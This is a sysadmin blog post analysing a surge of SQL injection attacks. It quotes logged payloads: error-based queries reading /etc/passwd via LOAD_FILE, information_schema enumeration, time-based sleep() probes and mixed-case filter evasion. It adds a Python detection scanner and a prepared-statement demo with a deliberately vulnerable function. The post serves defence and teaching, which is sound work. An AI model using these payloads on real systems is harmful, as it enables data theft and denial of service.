Increase in SQL injection attacks

Summer vacation’s over? More and more SQL injection attacks observed

For about a week now, I have been noticing a huge increase in SQL injection attacks on various websites. Is anyone else seeing the same SQL injection attacks lately? This increased SQL injection activity, on various websites and databases, has the following characteristics:

SQL injection attack characteristics

I quickly noticed the following characteristics in the attacks. Note the casing: the mixed upper and lower case in keywords such as SeLeCt, FrOm and sLeep is a common attempt to slip past naive, case-sensitive keyword filters in application code or a WAF, so any detection rule must match case-insensitively:

SELECT * FROM Figures WHERE tPath='1' and(SeLeCt 1 FrOm(SeLeCt count(*),CoNcAt((SeLeCt(SeLeCt CoNcAt(char(33,126,33),LoAd_fIlE(0x2f6574632f706173737764),char(33,126,33))) FrOm information_schema.TaBlEs LiMiT 0,1),floor(rand(0)*2))x FrOm information_schema.TaBlEs GrOuP By x)a) and '1'='1' ORDER BY ID_Figures DESC;
SELECT cnt_id, cnt_title, cnt_title_link, cnt_plaats, cnt_meta, cnt_content1, cnt_Publish, cnt_date_insert, cnt_laatste_bewerkt, keuze_afbeelding, Bnr_Visible_from, Bnr_Visible_till, Bnr_Visible_Unlimited FROM tbl_content WHERE Foobar and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from `information_schema`.columns where table_schema=0x696E666F726D6174696F6E5F736368656D61 and table_name=0x494E4E4F44425F4255464645525F504147455F4C5255 limit 12,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1 = 1 and cnt_Publish = 1 and ('2014-08-07 10:51:21' Between Bnr_Visible_from And Bnr_Visible_till or Bnr_Visible_Unlimited = 1) ORDER BY cnt_date_insert DESC LIMIT 0, 1;
SELECT * FROM course_offerings where courseID = '54' AnD sLeep(3) ANd '1';
SELECT * FROM course_offerings where ((courseTitle = '54' AnD sLeep(3) ANd '1') AND (courseType = 2));
SELECT page_content FROM pages WHERE page_name = 'weblog_en' AND SLEEP(3) oRDeR BY 1 #';
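The characteristics above can be turned into detection logic for a log scanner. The following Python is an added example, not code from the post; the sample queries are constructed from the five logged queries (some column lists trimmed) plus one benign query for comparison, and the signature names are my own. It matches the techniques case-insensitively and decodes the 0x... hex literals and char() calls so the analyst sees what the attacker was actually after.

```python
import re

# Constructed sample queries modelled on those shown in the post (some column
# lists trimmed); the last one is a benign query for comparison.
SAMPLE_QUERIES = [
    "SELECT * FROM Figures WHERE tPath='1' and(SeLeCt 1 FrOm(SeLeCt count(*),"
    "CoNcAt((SeLeCt(SeLeCt CoNcAt(char(33,126,33),LoAd_fIlE(0x2f6574632f706173737764),"
    "char(33,126,33))) FrOm information_schema.TaBlEs LiMiT 0,1),floor(rand(0)*2))x "
    "FrOm information_schema.TaBlEs GrOuP By x)a) and '1'='1' ORDER BY ID_Figures DESC;",
    "SELECT cnt_id, cnt_title FROM tbl_content WHERE Foobar and(select 1 from(select count(*),"
    "concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from "
    "`information_schema`.columns where table_schema=0x696E666F726D6174696F6E5F736368656D61 "
    "and table_name=0x494E4E4F44425F4255464645525F504147455F4C5255 limit 12,1)) from "
    "`information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables "
    "group by x)a) and 1=1 = 1 and cnt_Publish = 1;",
    "SELECT * FROM course_offerings where courseID = '54' AnD sLeep(3) ANd '1';",
    "SELECT page_content FROM pages WHERE page_name = 'weblog_en' AND SLEEP(3) oRDeR BY 1 #';",
    "SELECT * FROM course_offerings where courseID = '54';",
]

HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")
CHAR_CALL = re.compile(r"\bchar\(([\d\s,]+)\)", re.IGNORECASE)
KEYWORD = re.compile(
    r"\b(select|from|where|and|or|union|concat|sleep|order|group|by|limit)\b",
    re.IGNORECASE,
)

# Technique signatures (names are my own). All are case-insensitive, so the
# SeLeCt / sLeep casing trick does not help the attacker.
SIGNATURES = {
    "time_based_blind": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.IGNORECASE),
    "error_based_double_query": re.compile(
        r"\bfloor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.IGNORECASE
    ),
    "schema_enumeration": re.compile(r"\binformation_schema\b", re.IGNORECASE),
    "file_read": re.compile(r"\bload_file\s*\(", re.IGNORECASE),
}


def decode_literals(query):
    """Return the strings hidden in 0x... hex literals and char(...) calls."""
    decoded = []
    for hexdigits in HEX_LITERAL.findall(query):
        if len(hexdigits) % 2:
            continue  # not a byte string, e.g. a numeric 0x literal
        try:
            decoded.append(bytes.fromhex(hexdigits).decode("ascii"))
        except UnicodeDecodeError:
            continue
    for arglist in CHAR_CALL.findall(query):
        decoded.append("".join(chr(int(n)) for n in arglist.split(",") if n.strip()))
    return decoded


def has_mixed_case_keywords(query):
    """True if any SQL keyword is neither all upper nor all lower case (SeLeCt, sLeep)."""
    return any(k != k.upper() and k != k.lower() for k in KEYWORD.findall(query))


def classify(query):
    """Verdict for one logged query: matched techniques, casing trick, decoded literals."""
    techniques = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    return {
        "techniques": techniques,
        "mixed_case": has_mixed_case_keywords(query),
        "decoded": decode_literals(query),
    }


def scan(queries):
    """Return (query, verdict) for every query that matches at least one signature."""
    flagged = []
    for query in queries:
        verdict = classify(query)
        if verdict["techniques"]:
            flagged.append((query, verdict))
    return flagged


if __name__ == "__main__":
    for query, verdict in scan(SAMPLE_QUERIES):
        print(verdict["techniques"], verdict["decoded"], query[:60])
```

Run against the samples it flags four of the five queries and decodes 0x2f6574632f706173737764 to /etc/passwd and 0x494E4E4F44425F4255464645525F504147455F4C5255 to INNODB_BUFFER_PAGE_LRU; the same functions can be fed the general_log or slow-query log of a suspected server.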

The first two queries are error-based injections: the count(*) ... floor(rand(0)*2) ... GrOuP By x construction makes MySQL fail with a duplicate-entry error, and the error message echoes back whatever the attacker wrapped in the CoNcAt(). In the first query that is the contents of /etc/passwd (the hex literal 0x2f6574632f706173737764 is '/etc/passwd'; LOAD_FILE() only reads it if the MySQL account has the FILE privilege), in the second a column name from information_schema (0x494E4E4F44425F4255464645525F504147455F4C5255 is INNODB_BUFFER_PAGE_LRU). The sLeep(3) in the other three queries is a time-based blind injection probe: if the page takes three seconds longer to respond, the attacker knows the injection works. It is also very nasty because every such request holds a MySQL connection and a web-server worker for three seconds; enough of them in parallel exhaust max_connections and cause the website and backend database-server Denial of Service (MySQL sleep() attacks) I've described earlier.

Therefore, to prevent SQL injection, never build SQL statements by concatenating user-supplied input into the query text in your PHP, classic ASP / VBScript, Perl or ASP.NET code; validate the input, but rely on parameterized (prepared) statements as the actual defence. With PHP, use MySQLi or PHP Data Objects (PDO) prepared statements with bound parameters. In classic ASP / VBScript and ASP.NET, use the ADODB.Command object with its Parameters collection to prepare statements. In Perl, use DBI placeholders with prepare() and execute().
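To show why the prepared statement is the defence and input validation only a second layer, here is an added example, not code from the post, in Python with the standard-library sqlite3 module (the post recommends PDO/MySQLi/ADODB.Command; the placeholder mechanism is the same). The Figures table with tPath and ID_Figures comes from the first logged query; the title column, the rows and the payload are constructed. The payload uses the OR form of the quote-closing tautology so the difference in returned rows is visible.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's Figures table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Figures (ID_Figures INTEGER PRIMARY KEY, tPath TEXT, title TEXT)"
    )
    conn.executemany(
        "INSERT INTO Figures (tPath, title) VALUES (?, ?)",
        [("1", "public figure"), ("2", "internal figure"), ("3", "draft figure")],
    )
    return conn


def figures_vulnerable(conn, tpath):
    """The bug: user input is spliced into the SQL text, so a quote in it rewrites the query."""
    sql = (
        "SELECT ID_Figures, tPath, title FROM Figures WHERE tPath='"
        + tpath
        + "' ORDER BY ID_Figures DESC"
    )
    return conn.execute(sql).fetchall()


def figures_prepared(conn, tpath):
    """The fix: a placeholder. The driver sends the value separately; it can only ever be data."""
    sql = "SELECT ID_Figures, tPath, title FROM Figures WHERE tPath=? ORDER BY ID_Figures DESC"
    return conn.execute(sql, (tpath,)).fetchall()


# Constructed payload shaped like the quote-closing tautology in the logged queries.
PAYLOAD = "1' or '1'='1"


def demo():
    """Row counts for a legitimate value and for the payload, through both code paths."""
    conn = make_db()
    return {
        "legit_vulnerable": len(figures_vulnerable(conn, "1")),
        "payload_vulnerable": len(figures_vulnerable(conn, PAYLOAD)),
        "legit_prepared": len(figures_prepared(conn, "1")),
        "payload_prepared": len(figures_prepared(conn, PAYLOAD)),
    }


if __name__ == "__main__":
    # {'legit_vulnerable': 1, 'payload_vulnerable': 3, 'legit_prepared': 1, 'payload_prepared': 0}
    print(demo())
```

The concatenated version returns every row for the payload because the query became WHERE tPath='1' or '1'='1'; the prepared version looks for a tPath literally equal to the payload string and returns nothing. The PDO equivalent is $pdo->prepare('... WHERE tPath = ?') followed by execute(array($tpath)), and sleep() or LOAD_FILE() smuggled in the value stay inert the same way.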


Did this post help you solve a problem? Or did you find it interesting? Support Sysadmins of the North with a direct donation via PayPal or by bank wire transfer, IBAN: NL31 ABNA 0432217258 (Jan Reilink). Just $5 or €5 is more than enough, thanks!
